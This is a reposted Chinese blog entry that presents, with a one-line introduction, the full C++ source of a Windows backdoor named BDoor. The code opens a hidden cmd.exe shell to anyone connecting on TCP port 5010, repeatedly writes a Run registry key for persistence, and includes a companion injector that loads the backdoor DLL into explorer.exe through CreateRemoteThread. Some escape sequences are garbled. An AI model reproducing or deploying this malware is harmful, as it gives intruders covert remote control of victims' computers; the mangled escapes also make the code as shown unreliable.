本文共 6566 字,大约阅读时间需要 21 分钟。
后门程序BDoor及源码 选择自 的 Blog
提交时间:2005-04-22
提交用户:工具分类:后门程序运行平台:Windows工具大小:316825 Bytes文件MD5 :95e120d97967a3679dfdbd82985ea1ca工具来源:这是本人考研后的第一个作品(其实是很简陋的一个东西),拿出来共享,算是纪念考研成功吧!开放源代码,让大虾们见笑了。
// BDoor.cpp : Defines the entry point for the DLL application.
//#include "stdafx.h"
#include "winsock2.h"#pragma comment(lib,"ws2_32")
#define PORT 5010
#define REG_RUN "SOFTWARE//Microsoft//Windows//CurrentVersion//Run"struct THREADPARAM
{ SOCKET sock; HANDLE handle;};DWORD WINAPI ControlThread(void *no);
DWORD WINAPI BDoor(void *lp);DWORD WINAPI RecvThread(void *lp);DWORD WINAPI SendThread(void *lp);DWORD WINAPI WriteReg(void *no);BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call, LPVOID lpReserved ){ switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: { ::CreateThread(NULL,0,ControlThread,NULL,0,NULL); break; }case DLL_PROCESS_DETACH:
{ break; } } return TRUE;}DWORD WINAPI ControlThread(void *no)
{ CreateThread(NULL,0,WriteReg,NULL,0,NULL);WSADATA wsaData;
SOCKET listenSock; if(::WSAStartup(MAKEWORD(2,2),&wsaData)!=0) { return -1; }if((listenSock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
{ return -1; }sockaddr_in localAddr,inAddr;
int addrLen=sizeof(inAddr); localAddr.sin_addr.S_un.S_addr=0; localAddr.sin_family=AF_INET; localAddr.sin_port=htons(PORT); if(bind(listenSock,(sockaddr *)&localAddr,sizeof(localAddr))==SOCKET_ERROR) { closesocket(listenSock); return -1; } listen(listenSock,5);while(TRUE)
{ SOCKET acceptSock=accept(listenSock,(sockaddr *)&inAddr,&addrLen); DWORD ID; CreateThread(NULL,0,BDoor,&acceptSock,0,&ID); Sleep(100); }closesocket(listenSock);
::WSACleanup();}DWORD WINAPI WriteReg(void *no)
{ char sysPath[MAX_PATH]={0}; int ret=::GetSystemDirectory(sysPath,MAX_PATH); if(sysPath[ret-1]!='//') strcat(sysPath,"//"); strcat(sysPath,"DllInjection.exe"); int len=strlen(sysPath); while(TRUE) { HKEY hKey; if(::RegOpenKey(HKEY_LOCAL_MACHINE,REG_RUN,&hKey)!=ERROR_SUCCESS) continue; ::RegSetValueEx(hKey,"sysDll",0,REG_SZ,(BYTE *)sysPath,len);::RegCloseKey(hKey);
Sleep(5000); } return 0;}DWORD WINAPI BDoor(void *lp)
{ SOCKET sock=*((SOCKET *)lp); HANDLE hCmdOut,hCmdIn,hRead,hWrite;SECURITY_ATTRIBUTES sec={0};
sec.nLength=sizeof(sec); sec.lpSecurityDescriptor=NULL; sec.bInheritHandle=TRUE; CreatePipe(&hCmdIn,&hWrite,&sec,0); CreatePipe(&hRead,&hCmdOut,&sec,0);char cmdDir[MAX_PATH]={0};
::GetSystemDirectory(cmdDir,MAX_PATH); if(cmdDir[strlen(cmdDir)-1]!='//') strcat(cmdDir,"//"); strcat(cmdDir,"cmd.exe");STARTUPINFO startUpInfo={0};
startUpInfo.cb=sizeof(startUpInfo); startUpInfo.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES; startUpInfo.wShowWindow=SW_HIDE; startUpInfo.hStdError=startUpInfo.hStdOutput=hCmdOut; startUpInfo.hStdInput=hCmdIn;PROCESS_INFORMATION processInfo={0};
int ret=CreateProcess(cmdDir,NULL,NULL,NULL,TRUE,0,NULL,NULL,&startUpInfo,&processInfo); if(ret==0) { return -1; } CloseHandle(hCmdIn); CloseHandle(hCmdOut);DWORD ID1,ID2;
HANDLE hRecvThread,hSendThread; THREADPARAM recvParam={0},sendParam={0};recvParam.sock=sock;
recvParam.handle=hWrite; hRecvThread=CreateThread(NULL,0,RecvThread,&recvParam,0,&ID1);sendParam.sock=sock;
sendParam.handle=hRead; hSendThread=CreateThread(NULL,0,SendThread,&sendParam,0,&ID2);ULONG code;
::WaitForSingleObject(hRecvThread,INFINITE); ::GetExitCodeThread(hSendThread,&code); ::TerminateThread(hSendThread,code); ::GetExitCodeProcess(processInfo.hProcess,&code); ::TerminateProcess(processInfo.hProcess,code); closesocket(sock); CloseHandle(hWrite); CloseHandle(hRead); return 0;}DWORD WINAPI RecvThread(void *lp)
{ char cmd[256]={0}; THREADPARAM param=*((THREADPARAM *)lp); while(1) { char temp[2]={0}; int ret=recv(param.sock,temp,1,0); if(ret==0) { break; } else if(ret==1) { send(param.sock,temp,1,0); strcat(cmd,temp); if(temp[0]=='/n') { if(_stricmp(cmd,"exit/r/n")==0) { break; } ULONG len; ::WriteFile(param.handle,cmd,strlen(cmd),&len,NULL); memset(cmd,0,256); } } } return 0;}DWORD WINAPI SendThread(void *lp)
{ THREADPARAM param=*((THREADPARAM *)lp); char buf[1024]={0}; while(1) { ULONG len=0; ::PeekNamedPipe(param.handle,buf,1024,&len,NULL,NULL); if(len>0) { ::ReadFile(param.handle,buf,1024,&len,NULL); send(param.sock,buf,len,0); memset(buf,0,1024); } Sleep(100); } return 0;}
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
// DllInjection.cpp : Defines the entry point for the application.
//#include "stdafx.h"
#include "windows.h"#include "stdlib.h"#include "tlhelp32.h"#include "io.h"long GetProcessID(char *processName);
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow){ // TODO: Place code here. Sleep(5000); long ID=GetProcessID("explorer"); if(ID==-1) return -1;HINSTANCE hDll;
HINSTANCE (* pProc)(LPCTSTR); DWORD (WINAPI * pThreadProc)(void *); if((hDll=::LoadLibrary("kernel32.dll"))==NULL) return -1; if((pProc=(HINSTANCE (*)(LPCTSTR))::GetProcAddress(hDll,"LoadLibraryA"))==NULL) return -1; pThreadProc=(DWORD (WINAPI *)(void *))pProc;HANDLE hProcess=::OpenProcess(PROCESS_ALL_ACCESS,TRUE,ID);
if(hProcess==NULL) return -1;char pDllPath[MAX_PATH]={0};
char *pRemoteAddr=NULL; int ret=::GetSystemDirectory(pDllPath,MAX_PATH); if(pDllPath[ret-1]!='//') strcat(pDllPath,"//"); strcat(pDllPath,"BDoor.dll"); if(::_access(pDllPath,0)==-1) return -1; pRemoteAddr=(char*)::VirtualAllocEx(hProcess,NULL,strlen(pDllPath)+1,MEM_COMMIT,PAGE_READWRITE); if(pRemoteAddr==NULL) return -1; ret=::WriteProcessMemory(hProcess,pRemoteAddr,pDllPath,strlen(pDllPath),NULL); if(ret==0) return -1; HANDLE hRemoteThread=::CreateRemoteThread(hProcess,NULL,0,pThreadProc,pRemoteAddr,0,NULL);Sleep(100);
::VirtualFreeEx(hProcess,pRemoteAddr,strlen(pDllPath)+1,MEM_DECOMMIT); ::CloseHandle(hProcess); return 0;}long GetProcessID(char *processName)
{ HANDLE hSnapshot; PROCESSENTRY32 pe32={0}; BOOL fRet;hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
if(hSnapshot==NULL) return -1;pe32.dwSize=sizeof(PROCESSENTRY32);
fRet=Process32First(hSnapshot,&pe32); if(!fRet) return -1;int g=0;
char drive[_MAX_DRIVE]={0}; char dir[_MAX_DIR]={0}; char fname[_MAX_FNAME]={0}; char ext[_MAX_EXT]={0}; do { _splitpath(pe32.szExeFile,drive,dir,fname,ext); if(_stricmp(processName,fname)==0) { g=1; break; } }while(Process32Next(hSnapshot,&pe32)); if(g!=1) return -1;return pe32.th32ProcessID;
}
转载地址:http://snsqi.baihongyu.com/